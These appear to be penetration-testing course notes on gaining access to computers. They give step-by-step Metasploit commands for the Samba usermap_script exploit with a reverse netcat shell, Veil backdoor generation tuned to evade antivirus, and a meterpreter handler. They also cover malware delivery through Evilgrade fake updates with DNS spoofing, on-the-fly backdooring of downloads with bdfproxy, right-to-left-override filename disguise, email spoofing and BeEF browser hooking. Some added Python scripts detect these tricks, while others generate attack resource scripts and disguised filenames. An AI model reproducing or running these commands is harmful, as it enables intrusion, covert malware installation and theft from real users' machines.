Gaining Access¶
Introduction¶
Everything is a Computer¶
Two main approaches
Server Side
Does not require user interaction; all we need is the target's IP address.
Start with information gathering: find open ports, the OS and the installed services, then work from there.
Client Side
Requires user interaction, such as opening a file or a link.
Information gathering is key here: create a trojan and use social engineering to get the target to run it.
Server-Side Attacks¶
Need an IP Address
Very simple if the target is on the same network (netdiscover or zenmap).
If the target has a domain name, a simple ping will return its IP.
Getting the IP is trickier if the target is a personal computer, and it may be useless if the target reaches the internet through a router: the public IP belongs to the router (NAT), not to the target. Client-side attacks are more effective in that case, because a reverse connection initiated by the target passes through the NAT to us.
Basic Information Gathering & Exploitation¶
Try default passwords.
Services might be misconfigured, such as the "r" services (rexec, rlogin, rsh) on ports 512, 513 and 514, which when misconfigured trust remote hosts without a password.
Some might even contain a backdoor!
Code execution vulnerabilities in the service versions found.
Analysing Trojans¶
Check the properties of the file.
Is it what it seems to be? (Does the content match the extension and the icon?)
Run the file in a virtual machine and watch the resources it uses: processes, files written, network connections.
Use an online sandbox service (https://www.hybrid-analysis.com).
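As an added example (not from the original notes), a small Python triage script for the checks above: it compares the extension a file claims with its leading bytes, confirms a real PE header rather than just an "MZ" prefix, flags double extensions, and hashes the file so the hash can be looked up on a sandbox service. The sample bytes are constructed inside the script (a header-only fake PE and a bare JPEG header), not real malware, and the table of file signatures is a small hand-picked list.

```python
import hashlib
import struct
from typing import Optional

# Known file signatures ("magic bytes") -> file family. Partial list, enough for triage.
MAGIC = {
    b"MZ": "exe",                  # DOS/Windows executable (exe, dll, scr)
    b"\x7fELF": "elf",
    b"%PDF": "pdf",
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"PK\x03\x04": "zip",          # also docx/xlsx/pptx/jar/apk
}

# Claimed extensions that belong to the same family as a signature above.
EXT_FAMILY = {
    "jpeg": "jpg", "dll": "exe", "scr": "exe", "com": "exe",
    "docx": "zip", "xlsx": "zip", "pptx": "zip", "jar": "zip", "apk": "zip",
}
EXECUTABLE_FAMILIES = {"exe", "elf"}


def sniff(data: bytes) -> Optional[str]:
    """Return the file family implied by the leading bytes, or None if unknown."""
    for magic, family in MAGIC.items():
        if data.startswith(magic):
            return family
    return None


def is_pe(data: bytes) -> bool:
    """True only if the data carries a real PE header, not just an 'MZ' prefix."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of the 'PE\0\0' signature
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage(filename: str, data: bytes) -> dict:
    """Compare what the name claims with what the bytes say; hash the file for sandbox lookups."""
    parts = filename.lower().split(".")
    claimed = EXT_FAMILY.get(parts[-1], parts[-1]) if len(parts) > 1 else ""
    actual = sniff(data)
    return {
        "sha256": hashlib.sha256(data).hexdigest(),   # look this up on hybrid-analysis / VirusTotal
        "claimed": claimed,
        "actual": actual,
        "mismatch": actual is not None and actual != claimed,
        "executable": actual in EXECUTABLE_FAMILIES or is_pe(data),
        "double_extension": len(parts) > 2,           # e.g. holiday.jpg.exe
    }


# Constructed samples: a minimal, non-functional PE header (MZ stub + 'PE\0\0' at 0x80) and a JPEG header.
FAKE_PE = (b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x80)
           + b"\x00" * (0x80 - 0x40) + b"PE\x00\x00" + b"\x00" * 20)
FAKE_JPG = b"\xff\xd8\xff\xe0" + b"\x00" * 64

if __name__ == "__main__":
    for name, blob in [("invoice.pdf", FAKE_PE), ("holiday.jpg", FAKE_JPG), ("holiday.jpg.exe", FAKE_PE)]:
        print(name, triage(name, blob))
```

A mismatch between `claimed` and `actual`, or `executable` on a file that was sent as a document or picture, is enough to stop and run the file in the sandbox instead of on the host.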
Using the Above Attacks Outside the Network¶
All of the server-side and client-side attacks work outside the network.
You just need to configure the connection properly.
This can be done using:
Port forwarding on the router
Installing Kali / the tools in the cloud (a VPS with a public IP)
Port forwarding using SSH (a reverse tunnel)
Tunneling services
Metasploit¶
Metasploit is an exploit development and execution tool. It can also be used to carry out other penetration testing tasks such as port scans, service identification and post exploitation tasks.
Search for exploits for the open ports and service versions you found; the Rapid7 database (rapid7.com) lists the Metasploit module name to use.
msfconsole - runs the metasploit console
help - shows help
show [something] - something can be exploits, payloads, auxiliary or options.
use [something] - select a certain exploit, payload or auxiliary module.
set [option] [value] - configure [option] to have the value [value]
exploit - runs the current module
Example (newer Metasploit versions name the target option RHOSTS; RHOST is still accepted as an alias):
msfconsole
use exploit/multi/samba/usermap_script
show options
set RHOST 10.20.14.204
show options
show payloads
set PAYLOAD cmd/unix/reverse_netcat
show options
set LHOST 10.20.14.203
exploit
Nexpose¶
Vulnerability Management Framework
Discover open ports and running services
Find vulnerabilities
Find exploits
Verify them
Generate reports
Automate scans
Conclusion¶
The general steps are always the same!
Discover open ports and running services
Find vulnerabilities
Find exploits
Exploit / verify
Report
Client-Side Attacks¶
Use if server-side attacks fail
Or if the target's IP is useless (the target sits behind a NAT router)
Requires user interaction
Social engineering can be very useful
Information gathering is vital
Veil - Framework¶
A backdoor is a file that gives us full control over the machine it is executed on
Backdoors can be caught by antivirus programs
Veil is a framework for generating backdoors designed to evade antivirus detection (no generator is truly undetectable; signatures catch up, so re-check the file against a scanner before each use)
Veil Overview & Generating Backdoor¶
use 1
list
use 15
set LHOST 10.20.14.213
set LPORT 8080
options
set PROCESSORS 1
set SLEEP 6
generate
rev_https_8080 (the name given to the generated backdoor; Veil prints the path of the compiled file)
Search for nodistribute: an online scanner that, unlike VirusTotal, does not share uploaded samples with antivirus vendors
Upload the file
See whether the program is detected by antivirus programs; if it is, change the payload or the options and generate again
Listening for Incoming Connections¶
msfconsole
use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.20.14.213
set LPORT 8080
show options
exploit
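As an added example that is not part of the original notes, the following Python helper turns the usermap_script session from the Metasploit section and the handler above into msfconsole resource scripts (run with msfconsole -q -r file.rc) and validates LHOST, RHOSTS and LPORT first, since a loopback or mistyped LHOST is the usual reason a reverse payload never calls back. Module, payload and option names are the ones from these notes; the validation rules are my own.

```python
import ipaddress
from typing import Dict, List, Optional


def validate_options(options: Dict[str, str]) -> List[str]:
    """Return the problems a practitioner usually discovers only after 'exploit' hangs."""
    problems = []
    lhost = options.get("LHOST")
    rhost = options.get("RHOSTS", options.get("RHOST"))
    for key, value in (("LHOST", lhost), ("RHOSTS", rhost)):
        if value is None:
            continue
        try:
            addr = ipaddress.ip_address(value)
        except ValueError:
            problems.append(f"{key}={value} is not an IP address")
            continue
        if key == "LHOST" and (addr.is_loopback or addr.is_unspecified):
            problems.append("LHOST must be an address the target can reach back to, not loopback/0.0.0.0")
    if lhost and rhost and lhost == rhost:
        problems.append("LHOST and RHOSTS are the same host")
    port = options.get("LPORT")
    if port is not None and not (port.isdigit() and 0 < int(port) < 65536):
        problems.append(f"LPORT={port} is not a valid port")
    return problems


def build_rc(module: str, options: Dict[str, str], payload: Optional[str] = None,
             background: bool = False) -> str:
    """Render an msfconsole resource script; run it with: msfconsole -q -r script.rc"""
    problems = validate_options(options)
    if problems:
        raise ValueError("; ".join(problems))
    lines = [f"use {module}"]
    if payload:
        lines.append(f"set PAYLOAD {payload}")
    lines += [f"set {key} {value}" for key, value in options.items()]
    # -j runs the module as a background job, -z does not interact with the session:
    # right for a handler that should keep listening, wrong for a one-shot exploit.
    lines.append("exploit -j -z" if background else "exploit")
    return "\n".join(lines) + "\n"


# The two sessions from these notes, rendered as resource scripts.
USERMAP_RC = build_rc(
    "exploit/multi/samba/usermap_script",
    # Current Metasploit names the option RHOSTS; RHOST is accepted as an alias.
    {"RHOSTS": "10.20.14.204", "LHOST": "10.20.14.203"},
    payload="cmd/unix/reverse_netcat",
)
HANDLER_RC = build_rc(
    "exploit/multi/handler",
    {"LHOST": "10.20.14.213", "LPORT": "8080"},
    payload="windows/meterpreter/reverse_https",
    background=True,
)

if __name__ == "__main__":
    with open("usermap.rc", "w") as f:
        f.write(USERMAP_RC)
    with open("handler.rc", "w") as f:
        f.write(HANDLER_RC)
    print(USERMAP_RC)
    print(HANDLER_RC)
```

The handler script keeps listening in the background (`exploit -j -z`), so one msfconsole can stay up while backdoors are delivered; the exploit script runs once and drops into the session.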
Delivery Method¶
Put your backdoor file in /var/www/html in Kali
service apache2 start
Browse to the page on the Windows target, download and run the exe file
Simple method which won't work in practice (the target has to be persuaded to download and run a bare executable); see the smarter delivery methods below
Windows 10 Fake Updates¶
Fake an update for an already installed program
Install backdoor instead of the update
Requires DNS spoofing + Evilgrade (a server to serve the update)
Download and install Evilgrade
Download Evilgrade.zip
Go to Downloads and double-click evilgrade.zip to uncompress it.
Open a terminal and run the following commands:
cd /root/Downloads/evilgrade/
cpan Data::Dump
cpan Digest::MD5
cpan Time::HiRes
cpan RPC::XML
cp -r isrcore /etc/perl
Now the tool will work. It might display an error about Gnu.pm; this is a known bug with Evilgrade. If it annoys you, you can get rid of it by removing that library with the following command:
apt-get remove libterm-readline-gnu-perl
Just make sure you re-install it after you're done, in case it is needed by other tools:
apt-get install libterm-readline-gnu-perl
Start Evilgrade (./evilgrade)
Check programs that can be hijacked (show modules)
Select one (configure [module])
Set backdoor location (set agent [agent location])
Start Server (start)
Start DNS spoofing and the handler
# Start Evilgrade and configure a module:
cd /opt/evilgrade
./evilgrade
show options
configure dap
show options
set agent /var/www/html/backdoor.exe
set endsite www.speedbit.com
show options
start
# Become MITM
bettercap -iface eth0 -caplet /root/spoof.cap
set dns.spoof.all true
set dns.spoof.domains update.speedbit.com
dns.spoof on
# Listen for connections (multi/handler, as above)
# Then wait for the user to check for updates
Backdoor Windows 10 Downloads on the Fly¶
Backdoor any exe the target downloads over plain HTTP (HTTPS downloads cannot be modified in transit without a certificate the target trusts)
We need to be MITM
Set the IP address in the config (leafpad /etc/bdfproxy/bdfproxy.cfg)
proxyMode = transparent
# Under the Windows target sections, HOST is the attacker's (Kali) IP that the backdoored binaries connect back to
HOST = 10.0.2.15
Start bdfproxy (bdfproxy)
cd /opt/BDFProxy
./bdf_proxy.py
Redirect HTTP traffic to bdfproxy (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080)
Start listening for connections (msfconsole -r /usr/share/bdfproxy/bdf_proxy_msf_resource.rc)
Start ARP spoofing
Protecting Yourself Against Smart Delivery Methods¶
Ensure you're not being MITMed: use trusted networks and tools such as XArp that alert on ARP spoofing (the same MAC answering for several IPs, or the gateway's MAC changing)
Only download from HTTPS pages, and do not click through certificate warnings
Check the file hash after download against the value published on the vendor's HTTPS page (http://www.winmd5.com computes MD5; prefer SHA-256 where the vendor publishes it, and remember that a hash fetched over the same untrusted HTTP connection can be swapped along with the file)
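Added example (not from the original notes): the XArp-style check and the hash check in Python. It parses a constructed `ip neigh show` table (the Linux equivalent of `arp -a`; the addresses are made up), reports any MAC answering for more than one IP and any change in the gateway's MAC against a value recorded earlier on a trusted network, and verifies a download against a published hash with a constant-time comparison.

```python
import hashlib
import hmac
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample of `ip neigh show` output: the gateway .1 and the host .203 answer with the same MAC,
# which is what an ARP spoofing attack (arpspoof, bettercap) looks like from the victim's side.
NEIGH_TABLE = """\
10.20.14.1 dev eth0 lladdr 08:00:27:3a:1f:9c REACHABLE
10.20.14.203 dev eth0 lladdr 08:00:27:3a:1f:9c STALE
10.20.14.50 dev eth0 lladdr 3c:52:82:11:22:33 REACHABLE
10.20.14.77 dev eth0 FAILED
"""

LINE = re.compile(r"^(?P<ip>\S+)\s+dev\s+\S+\s+lladdr\s+(?P<mac>[0-9a-f:]{17})", re.I)


def parse_neighbours(text: str) -> Dict[str, str]:
    """ip -> mac for every entry that has a link-layer address (FAILED/INCOMPLETE entries are skipped)."""
    table = {}
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table


def duplicate_macs(table: Dict[str, str]) -> Dict[str, List[str]]:
    """MACs claimed by more than one IP: the classic sign of ARP spoofing (what XArp alerts on)."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_changed(table: Dict[str, str], gateway_ip: str, known_mac: str) -> bool:
    """Compare the gateway's current MAC with one recorded earlier on a trusted network."""
    current = table.get(gateway_ip)
    return current is not None and current != known_mac.lower()


def verify_download(data: bytes, expected_hex: str, algo: str = "sha256") -> bool:
    """Check a downloaded file against a hash published on the vendor's HTTPS page.
    Prefer SHA-256; MD5 collisions are practical, although an MD5 obtained over a trusted
    channel still catches a file that was swapped on the fly. Constant-time compare."""
    digest = hashlib.new(algo, data).hexdigest()
    return hmac.compare_digest(digest, expected_hex.lower())


if __name__ == "__main__":
    table = parse_neighbours(NEIGH_TABLE)
    print("duplicates:", duplicate_macs(table))
    print("gateway MAC changed:", gateway_changed(table, "10.20.14.1", "08:00:27:aa:bb:cc"))
    blob = b"constructed installer contents"
    print("hash ok:", verify_download(blob, hashlib.sha256(blob).hexdigest()))
```

Record the gateway's MAC once while on a network you trust and keep it; a change on a later visit is either a new router or someone in the middle, and either way worth not downloading executables until it is explained.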
Social Engineering¶
Gather info about the users
Build a strategy based on the info
Build a backdoor based on the info
Maltego¶
Maltego is an information gathering tool that can be used to collect information about a target.
Target can be a website, company, person, etc.
Discover entities associated with target
Display info on a graph
Come up with an attack strategy
Backdooring any File¶
Combine the backdoor with any file - a generic solution
Users are more likely to run a pdf, image or audio file than an executable
Works well with social engineering
How?
Use AutoIt to compile the backdoor and the decoy file into a single executable that opens the decoy and runs the backdoor
Use the right-to-left override character (U+202E; search for "right-to-left override" in the Kali character map): rename the file so that .exe becomes gpj.exe and paste the override character right after the file name, so that image[U+202E]gpj.exe is displayed as imageexe.jpg while Windows still treats it as an .exe
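As an added example (not from the original notes), Python that builds the right-to-left-override filename exactly as described, shows how a bidi-aware file browser displays it, and recovers the real extension, which is the same logic a mail gateway or a downloads scanner can use to flag the trick. The sample filenames are constructed.

```python
import os
from typing import Tuple

RLO = "\u202e"   # RIGHT-TO-LEFT OVERRIDE: everything after it is displayed reversed
# Bidi control characters that can be abused the same way (embeddings, overrides and isolates).
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
EXECUTABLE_EXTS = {"exe", "scr", "com", "bat", "cmd", "js", "vbs", "ps1", "msi", "hta", "pif"}


def disguise(stem: str, real_ext: str, fake_ext: str) -> str:
    """Build the filename the trick relies on: stem + RLO + reversed(fake_ext) + '.' + real_ext.
    disguise('photo', 'exe', 'jpg') is the string 'photo\\u202egpj.exe' on disk."""
    return f"{stem}{RLO}{fake_ext[::-1]}.{real_ext}"


def as_displayed(name: str) -> str:
    """Approximate what a bidi-aware file manager shows: text after the RLO is rendered right-to-left."""
    i = name.find(RLO)
    if i < 0:
        return name
    return name[:i] + name[i + 1:][::-1]


def true_extension(name: str) -> str:
    """The extension the OS actually uses: strip bidi controls, then take the last suffix."""
    clean = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    return os.path.splitext(clean)[1].lstrip(".").lower()


def inspect_filename(name: str) -> Tuple[bool, str]:
    """(suspicious, reason). Any bidi control in a filename is a red flag on its own;
    a hidden executable extension is the confirmed attack."""
    has_bidi = any(ch in BIDI_CONTROLS for ch in name)
    ext = true_extension(name)
    if has_bidi and ext in EXECUTABLE_EXTS:
        return True, f"bidi override hides a .{ext}; shown as {as_displayed(name)!r}"
    if has_bidi:
        return True, "filename contains bidi control characters"
    if ext in EXECUTABLE_EXTS:
        return True, f"plain .{ext} executable"
    return False, "ok"


if __name__ == "__main__":
    trick = disguise("holiday", "exe", "jpg")
    print(repr(trick), "->", as_displayed(trick))
    print(inspect_filename(trick))
    print(inspect_filename("holiday.jpg"))
```

Note that `as_displayed` models the rendering, not the file system: the operating system never sees a `.jpg` file, which is exactly why the check strips the control characters before reading the extension.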
Fake Emails¶
Send fake emails
Looks like it was sent from any address, as long as the receiving mail server does not enforce SPF, DKIM and DMARC for the spoofed domain
Pretend to be a friend, company, boss, etc.
Friend - Ask them to open a file (image, pdf, etc.)
Support member - ask to login to control panel using fake login page
Support member - ask to run a command on a server
Ask to visit a normal web page
etc.
Use attached sendmail.php
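Added example, not part of the original notes: the receiving side of a spoofed mail. A modern mail server records SPF, DKIM and DMARC results in an Authentication-Results header, and a client or filter can use them to catch a forged From before anyone opens the attachment. The two messages below are constructed (domains under .example), and the decision rule in likely_spoof is my own.

```python
import re
from email import message_from_string
from email.message import Message
from email.utils import parseaddr
from typing import Dict, Optional

# Constructed sample: what a spoofed mail looks like once the receiving MX has added its verdicts.
# The From header says "boss", the envelope sender and SPF say otherwise, and DMARC fails.
SPOOFED = """\
Return-Path: <bounce@mailer.example>
Authentication-Results: mx.company.example;
 spf=fail (sender IP is 203.0.113.7) smtp.mailfrom=mailer.example;
 dkim=none;
 dmarc=fail (p=REJECT) header.from=company.example
From: "The Boss" <boss@company.example>
To: victim@company.example
Subject: Please review the attached report

Can you open the attached file and get back to me before the meeting?
"""

# Constructed sample of a genuine message from the same sender for comparison.
LEGIT = """\
Return-Path: <boss@company.example>
Authentication-Results: mx.company.example;
 spf=pass smtp.mailfrom=company.example;
 dkim=pass header.d=company.example;
 dmarc=pass header.from=company.example
From: "The Boss" <boss@company.example>
To: victim@company.example
Subject: Meeting moved

Meeting is at 3pm.
"""

AUTH_TOKEN = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.I)


def auth_results(msg: Message) -> Dict[str, str]:
    """method -> result parsed from the Authentication-Results header, lower-cased."""
    header = msg.get("Authentication-Results", "")
    return {m.lower(): r.lower() for m, r in AUTH_TOKEN.findall(header)}


def domain_of(addr: Optional[str]) -> str:
    _, address = parseaddr(addr or "")
    return address.rpartition("@")[2].lower()


def spoof_indicators(raw: str) -> Dict[str, bool]:
    msg = message_from_string(raw)
    auth = auth_results(msg)
    from_domain = domain_of(msg.get("From"))
    envelope_domain = domain_of(msg.get("Return-Path"))
    return {
        "envelope_mismatch": bool(envelope_domain) and envelope_domain != from_domain,
        "spf_failed": auth.get("spf") in {"fail", "softfail"},
        "dkim_missing": auth.get("dkim", "none") in {"none", "fail"},
        "dmarc_failed": auth.get("dmarc") == "fail",
    }


def likely_spoof(raw: str) -> bool:
    """A DMARC fail on the From domain is decisive; otherwise require SPF fail plus no valid DKIM."""
    ind = spoof_indicators(raw)
    return ind["dmarc_failed"] or (ind["spf_failed"] and ind["dkim_missing"])


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("legit", LEGIT)):
        print(label, spoof_indicators(raw), "->", likely_spoof(raw))
```

The practical point for the attacker side of these notes is the same as for the defender: a forged From only survives where the target domain has no DMARC policy or the receiver ignores it, so check the target's DMARC record before relying on this technique.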
Beef Framework¶
The Browser Exploitation Framework lets us launch a number of attacks on a hooked target. Targets are hooked once they load the hook URL (the hook.js script)
DNS-spoof requests to a page containing the hook
Inject the hook into browsed pages (need to be MITM; only possible on plain HTTP pages)
Use XSS exploit
Social engineer the target to open a hook page
Get the user to browse to your beef page